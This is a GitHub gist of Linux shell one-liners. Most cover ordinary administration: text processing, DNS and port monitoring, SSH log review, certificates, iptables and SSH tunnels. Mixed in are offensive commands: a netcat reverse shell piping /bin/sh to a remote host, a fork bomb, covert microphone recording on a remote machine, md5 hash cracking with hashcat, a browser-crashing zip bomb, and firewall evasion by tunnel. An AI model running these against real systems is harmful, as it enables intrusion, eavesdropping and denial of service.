@brannondorsey
Last active July 8, 2022 05:07
One Liners

Count the number of unique characters in a file

# https://unix.stackexchange.com/questions/5010/how-can-i-count-the-number-of-different-characters-in-a-file
# works for linux. There is a variation for MacOS in the link ^
sed 's/\(.\)/\1\n/g' text.txt | sort | uniq -c # sort -nr # uncomment this to sort the list by frequency

Replace a string in all instances of files in a directory

# replace all instances of "original" with "replacement" for every file in the src/ directory
# -print0 / -0 keep filenames that contain spaces or newlines from being split by xargs
find src/ -type f -print0 | xargs -0 sed -i "s#original#replacement#g"

Set Time

sudo cp /usr/share/zoneinfo/America/New_York /etc/localtime

Print collaborators on a git repository

# Taken from the Rust Chrono library makefile https://github.com/chronotope/chrono/blob/master/Makefile
git log --format='%aN <%aE>' | sort -u

Print UPnP broadcasts & services

See what hosts on your LAN provide Universal Plug-and-Play (UPnP) and Simple Service Discovery Protocol (SSDP) services and where to find them. Taken from here.

# Listen for all UPnP broadcasts (including yourself).
# NOTE: 239.255.255.250 is a special multicast address that all IPv4 UPnP uses
sudo tcpdump -vv -A -s 0 'port 1900 and host 239.255.255.250 and udp'

Get system's current DNS server

Confirmed to work with Ubuntu 16.04, taken from here.

# replace eth0 with your network interface
nmcli device show eth0 | grep IP4.DNS

See all DNS traffic on a network interface

sudo tcpdump udp port 53

Generate a self-signed SSL certificate key pair

# from https://www.sslshopper.com/article-most-common-openssl-commands.html
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out certificate.crt

Perform full system virus scan with ClamAV

# requires ClamAV to be installed
# sudo apt install clamav
# will take a while... saves information about infected files to scan.log
sudo clamscan --infected --recursive --log scan.log /

Get IP address

# https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-14-04-lts
# 'inet ' (with the trailing space) skips the inet6 lines so you get the IPv4 address
ip addr show eth0 | grep 'inet ' | awk '{ print $2; }' | sed 's/\/.*$//' | head -n 1

Recursively spawn child processes until your machine crashes

# this is the most cryptic sh!t I've ever seen. From RTFM.
:(){ :|: & };:

Netcat reverse shell

Ok, technically this one isn't a one liner, but it is so damn powerful I have to include it.

From machine that receives shell:

# listen on port 8484
nc -l -p 8484

From machine that provides remote shell:

# from Red Team Field Manual
# equivalent to "nc -e /bin/sh <HOST> <PORT>", but most versions of nc don't support "-e"
# replace HOST with ip address of the machine "nc" is listening on
rm /tmp/x ; mkfifo /tmp/x ; cat /tmp/x | /bin/sh -i 2>&1 | nc HOST 8484 > /tmp/x

Print all DNS request hostnames on a network

# listen on all interfaces (promiscuous mode by default, but likely will only show your machine's traffic)
# can buffer packets up to a minute before displaying results
sudo tcpdump -i any -s 0 -l -n port 53 | sed -e "s/CNAME//" | awk '{ if ($8 ~ /.*\..*/) { print $8 } }' | sed -e "s/[,.]\{1,2\}$//"

Outputs:

twitter.com
twitter.com
www.facebook.com
www.facebook.com
star-mini.c10r.facebook.com
star-mini.c10r.facebook.com
gmail.com
gmail.com
gmail.com
www.google.com
www.google.com
www.google.com

# print sender -> receiver as well
sudo tcpdump -i any -s 0 -l -n port 53 | sed -e "s/CNAME//" | awk '{ if ($8 ~ /.*\..*/) { print $3 " > " $5 " DNS: " $8 } }' | sed -e "s/[,.]\{1,2\}$//"
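The two tcpdump pipelines above print every hostname that appears in field 8, which is why each name shows up twice (once in the query, once in the answer) and why the CNAME has to be stripped first. The following is an added example, not part of the original gist, that keeps only the query packets (the record type carries a trailing "?"), reports which client asked for what, and tallies the most-queried names, which is the view you want when watching a LAN for unexpected resolutions. It assumes the default `tcpdump -n` line layout and runs on a constructed sample rather than a real capture.

```shell
#!/bin/sh
# Constructed sample of "tcpdump -n port 53" output (documentation IP ranges, not a real capture).
SAMPLE_TCPDUMP='13:01:02.123456 IP 192.168.1.20.51234 > 192.168.1.1.53: 41023+ A? twitter.com. (29)
13:01:02.130000 IP 192.168.1.1.53 > 192.168.1.20.51234: 41023 2/0/0 A 203.0.113.1, A 203.0.113.65 (61)
13:01:03.000001 IP 192.168.1.20.51235 > 192.168.1.1.53: 41024+ A? www.facebook.com. (34)
13:01:03.010000 IP 192.168.1.1.53 > 192.168.1.20.51235: 41024 2/0/0 CNAME star-mini.c10r.facebook.com., A 203.0.113.35 (80)
13:01:04.000000 IP 192.168.1.20.51236 > 192.168.1.1.53: 41025+ AAAA? gmail.com. (27)
13:01:05.000000 IP 192.168.1.20.51237 > 192.168.1.1.53: 41026+ A? gmail.com. (27)'

# stdin: tcpdump lines -> "client hostname" for each query (answers are skipped)
dns_queries() {
  awk '$7 ~ /\?$/ {                          # queries carry the record type with a "?", e.g. "A?" or "AAAA?"
         host = $8; sub(/\.$/, "", host)       # drop the trailing root dot
         src = $3;  sub(/\.[0-9]+$/, "", src)  # drop the client source port
         print src, host
       }'
}

# stdin: tcpdump lines -> "count hostname", most queried first
dns_query_counts() {
  dns_queries | awk '{ print $2 }' | sort | uniq -c | sort -rn
}

# offline demo on the constructed sample; for live traffic pipe tcpdump in instead:
#   sudo tcpdump -i any -s 0 -l -n port 53 | dns_queries
printf '%s\n' "$SAMPLE_TCPDUMP" | dns_query_counts
```

Because only queries are counted, the duplicate lines from the original pipeline disappear and the client address tells you which host on the LAN is doing the asking.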

Count the number of email address occurrences in each text file in a folder

# email regex from here https://www.shellhacks.com/regex-find-email-addresses-file-grep/
# grep -c counts matching LINES, not matches, so print each match with -o and count them per file
# (files with no addresses are not listed)
grep -o -E "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}" folder/*.txt | cut -d: -f1 | sort | uniq -c | sort -nr

Record the mic on a remote linux machine

# Red Team Field Manual
ssh user@ip arecord - | aplay -

Get a random filename from a folder

echo "$(ls . | sort -R | head -n 1)"

Generate strong passwords with /dev/urandom

# https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers
# LC_ALL=C makes tr treat the input as bytes; without it, UTF-8 locales (e.g. macOS) abort on "Illegal byte sequence"
LC_ALL=C tr -dc 'a-zA-Z0-9._!@#$%^&*()' < /dev/urandom | fold -w 20 | head -n 1

Brute-force crack md5 hashes

hashcat -m 0 -a 3 hashes.txt --potfile-path hashcat.pot 

where hashes.txt is a file with one md5 hash per line and hashcat.pot is the potfile that receives the cracked hashes.

Create a Zip Bomb

# create a 10MB gzipped file that unzips to 10GB and crashes a web browser
# https://blog.haschek.at/2017/how-to-defend-your-website-with-zip-bombs.html
dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

View Failed SSH Logins

# https://extremeshok.com/6309/linux-see-all-failed-ssh-login-attempts/
sudo grep 'sshd.*Failed' /var/log/auth.log
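The grep above shows the raw lines; what you usually want next is which source addresses are hammering the box and which usernames they try. The following is an added example, not part of the original gist, that extracts the source IP and username from each failed-password line, counts attempts per source and flags sources at or above a threshold. It assumes the OpenSSH log format shown in the constructed sample (documentation IP ranges, not real hosts).

```shell
#!/bin/sh
# Constructed auth.log excerpt (documentation IP ranges, not real hosts).
SAMPLE_AUTH='Jul  8 05:01:12 host sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Jul  8 05:01:15 host sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2
Jul  8 05:01:19 host sshd[1203]: Failed password for root from 203.0.113.7 port 51024 ssh2
Jul  8 05:02:40 host sshd[1210]: Accepted publickey for alice from 192.0.2.10 port 40211 ssh2: ED25519 SHA256:EXAMPLEFINGERPRINT
Jul  8 05:03:01 host sshd[1215]: Failed password for alice from 192.0.2.10 port 40212 ssh2
Jul  8 05:03:30 host sshd[1220]: Failed password for invalid user oracle from 198.51.100.9 port 33001 ssh2'

# stdin: auth.log lines -> "ip user" per failed password attempt
# the optional "invalid user " prefix marks attempts against accounts that do not exist
failed_logins() {
  grep 'sshd.*Failed password' |
    sed -E 's/.*Failed password for (invalid user )?([^ ]+) from ([^ ]+) port.*/\3 \2/'
}

# stdin: auth.log lines -> "count ip", noisiest source first
failed_by_ip() {
  failed_logins | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# $1: threshold (default 3); stdin: auth.log lines -> sources with at least that many failures
flag_sources() {
  failed_by_ip | awk -v t="${1:-3}" '$1 >= t { print $2 }'
}

# offline demo on the constructed sample; on a live host:
#   sudo grep sshd /var/log/auth.log | flag_sources 5
printf '%s\n' "$SAMPLE_AUTH" | failed_by_ip
```

On systemd hosts without a text auth.log, `journalctl -u ssh -o cat` produces the same message bodies and can be piped into these functions unchanged.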

View Outbound TCP Connections

# https://serverfault.com/questions/670331/how-to-make-netstat-on-linux-only-show-outbound-tcp-connections
# shows all connections that AREN'T localhost
netstat -atn | tr -s ' ' | cut -f5 -d ' ' | grep -v '127.0.0.1'

Check Bound (Listening) Ports

# https://debian-administration.org/article/184/How_to_find_out_which_process_is_listening_upon_a_port
# it can take a while... (the last grep filters out unix sockets)
netstat -a | grep LISTEN | grep -v unix

Once you get those results, you can check out which PIDs opened those ports with

sudo lsof -i :PORT
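Listing listeners is most useful when you compare them against what the host is supposed to run. The following is an added example, not part of the original gist, that parses `netstat -tln`-style output into a set of listening TCP ports and prints any port that is not on an allowlist, so an unexpected listener (here a constructed 8080) stands out. It assumes the netstat column layout shown in the constructed sample; `ss -ltn` prints its columns in a different order and would need the field numbers adjusted.

```shell
#!/bin/sh
# Constructed sample in "netstat -tln" layout (not captured from a real host).
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN'

# stdin: netstat -tln lines -> one listening TCP port per line, de-duplicated
# the port is the last colon-separated piece of "Local Address", which also works for ":::22"
listening_ports() {
  awk '$6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' | sort -un
}

# $1: space-separated allowlist of ports; stdin: netstat -tln lines
# prints every listening port that is NOT in the allowlist
unexpected_ports() {
  listening_ports | awk -v allow="$1" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    !($1 in ok) { print }'
}

# offline demo on the constructed sample; on a live host:
#   netstat -tln | unexpected_ports "22 631"
printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_ports "22 631"
```

Anything this prints is a port to chase down with the `lsof -i :PORT` command above.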

Port Forwarding With iptables

This is particularly useful for giving non-root users access to privileged ports.

# forward external traffic on port 80 to 8080
sudo iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-ports 8080

# the same, but can be resolved on localhost
sudo iptables -I OUTPUT -t nat -p tcp -d 127.0.0.1 --dport 80 -j REDIRECT --to-ports 8080

Make Current iptables Rules Persist After Reboot

# if you've already got iptables-persistent installed, just run the second part
# the file is rules.v4 (rules.v6 for ip6tables); write it through tee because a plain ">"
# redirect runs as your unprivileged user and fails on /etc/iptables
sudo apt install iptables-persistent && sudo iptables-save | sudo tee /etc/iptables/rules.v4 > /dev/null
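Re-running the redirect one-liners appends a duplicate rule each time, and the persisted file then carries those duplicates forward. The following is an added example, not part of the original gist, that wraps the same PREROUTING and OUTPUT redirects in an idempotent check (`iptables -C` before `iptables -A`) and persists the result. The `IPTABLES` variable is an assumption of this example so the logic can be exercised without root; the rule specs are the ones from the gist.

```shell
#!/bin/sh
# Idempotent version of the redirect rules: "-A" appends a duplicate every time it runs,
# so test with "-C" first and only append when the rule is missing.
# IPTABLES is overridable (hypothetical knob for this example) so the logic can be tested without root.
IPTABLES="${IPTABLES:-sudo iptables}"

# $1: chain, remaining args: rule spec in the nat table. Prints what happened.
ensure_nat_rule() {
  chain="$1"; shift
  if $IPTABLES -t nat -C "$chain" "$@" 2>/dev/null; then
    echo "present: $chain $*"
  else
    $IPTABLES -t nat -A "$chain" "$@" && echo "added: $chain $*"
  fi
}

# $1: externally visible (privileged) port, $2: port the unprivileged service listens on
redirect_port() {
  from="$1"; to="$2"
  # traffic arriving from other hosts for port $from
  ensure_nat_rule PREROUTING -p tcp --dport "$from" -j REDIRECT --to-ports "$to"
  # locally generated traffic to 127.0.0.1:$from, so connecting to localhost:$from works too
  ensure_nat_rule OUTPUT -p tcp -d 127.0.0.1 --dport "$from" -j REDIRECT --to-ports "$to"
}

# iptables-save runs as root but a ">" redirect would run as you, so write through tee
persist_rules() {
  sudo iptables-save | sudo tee /etc/iptables/rules.v4 > /dev/null
}

# usage (needs root): redirect_port 80 8080 && persist_rules
```

`iptables -C` exits non-zero both when the rule is absent and when the chain or table does not exist, so on a host without the nat table the script falls through to `-A` and surfaces that error instead of silently reporting "present".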

Basic SSH Tunneling

# "inbound" tunnel from a remote server's port to a port on your machine.
# can be used to evade local network firewalls
# NOTE: set the variables before the command; a VAR=value prefix on the same line is not
# visible to the shell's own ${VAR} expansion, so the original form produced "-R *::localhost:".
# "*" is quoted so the shell does not glob it, and binding to "*" on the remote side
# also needs "GatewayPorts yes" in that server's sshd_config.
RPORT=8080; LPORT=80; ssh -R "*:${RPORT}:localhost:${LPORT}" USER@HOST
# "outbound" tunnel from your local machine to a port on a remote machine.
# can be used to access a port on a server that isn't publicly available on the net
LPORT=8080; RPORT=80; ssh -L "localhost:${LPORT}:localhost:${RPORT}" USER@HOST

SOCKS5 proxy Traffic through a remote server

You can proxy HTTP/S traffic from a web browser through a remote server in this way. Once you've run the below command open Firefox > Edit > Preferences > Network Settings > Configure Proxy Access to the Internet and then add "localhost" and "8080" as a SOCKS proxy.

# -C compress, -f go to background, -N run no remote command, -D open a SOCKS listener on LPORT
# (set LPORT on its own so ${LPORT} expands; 8080 matches the browser setting described above)
LPORT=8080; ssh -CfND "${LPORT}" USER@HOST

Create a Persistent ssh-tunnel with Autossh

# bind local port 22 to port 2222 on REMOTE_HOST
# -M 0 disables autossh's own monitor port and relies on the ServerAlive options to detect a dead link;
# binding to 0.0.0.0 on the remote side needs "GatewayPorts yes" in its sshd_config
autossh -f -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -R 0.0.0.0:2222:localhost:22 REMOTE_USER@REMOTE_HOST

Kill a Process by Grep

pkill will only kill processes that match a binary name. This allows you to kill a process by grep, e.g. kill a python slowloris.py without killing all python processes.

# https://www.commandlinefu.com/commands/view/1138/ps-ef-grep-process-grep-v-grep-awk-print-2-xargs-kill-9
ps -ef | grep "python slowloris" | grep -v grep | awk '{print $2}' | xargs kill -9

Mirror a Static Website

# https://www.guyrutenberg.com/2014/05/02/make-offline-mirror-of-a-site-using-wget/
wget --mirror --execute="robots = off" --convert-links --adjust-extension --page-requisites --no-parent -N http://WEBSITE.com

Generating Random Data (python)

# generate a space-delimited string of 300 random floats between -1.0 and 1.0
# (wrapped in print() so it also produces output when run as a script rather than in the REPL)
import random; print(' '.join(str(random.uniform(-1, 1)) for _ in range(300)))

Remove non-UTF-8 characters from a file

# https://stackoverflow.com/questions/12999651/how-to-remove-non-utf-8-characters-from-text-file
iconv -f utf-8 -t utf-8 -c file.txt > newfile.txt